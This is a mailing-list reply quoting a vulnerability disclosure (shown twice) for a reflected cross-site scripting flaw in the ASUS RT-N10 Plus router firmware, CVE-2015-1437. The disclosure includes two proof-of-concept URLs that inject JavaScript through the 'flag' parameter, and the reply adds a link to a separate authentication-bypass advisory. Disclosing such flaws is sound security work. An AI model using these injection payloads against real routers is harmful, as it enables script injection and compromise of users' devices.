*** kingkaustubh (at) me (dot) com [email concealed] wrote:
> #####################################
> Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router
> Author: Kaustubh G. Padwad
> Product: ASUS Router RT-N10 Plus
> Firmware: 2.1.1.1.70
> Severity: HIGH
> Auth: Not requierd
> CVE ID: CVE-2015-1437
> # Description:
> Vulnerable Parameter: flag=
> # Vulnerability Class:
> Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XS
S))
[...]
> Enter this URL
> 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.las
tmodified)%2f%2f372137b5d
> 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S
3curity_B3ast")%2f%2f372137b5d
> #####################################
> Title:- Reflected XSS vulnarbility in Asus RT-N10 Plus router
> Author: Kaustubh G. Padwad
> Product: ASUS Router RT-N10 Plus
> Firmware: 2.1.1.1.70
> Severity: HIGH
> Auth: Not requierd
> CVE ID: CVE-2015-1437
> # Description:
> Vulnerable Parameter: flag=
> # Vulnerability Class:
> Cross Site Scripting (https://www.owasp.org/index.php/Top_10_2013-A3-Cross-Site_Scripting_(XS
S))
[...]
> Enter this URL
> 1.http://router/error_page.htm?flag=initial78846%27%3balert(document.las
tmodified)%2f%2f372137b5d
> 2.http://router/error_page.htm?flag=initial78846%27%3balert("Hacked_BY_S
3curity_B3ast")%2f%2f372137b5d
https://sintonen.fi/advisories/asus-router-auth-bypass.txt
Micha
[ reply ]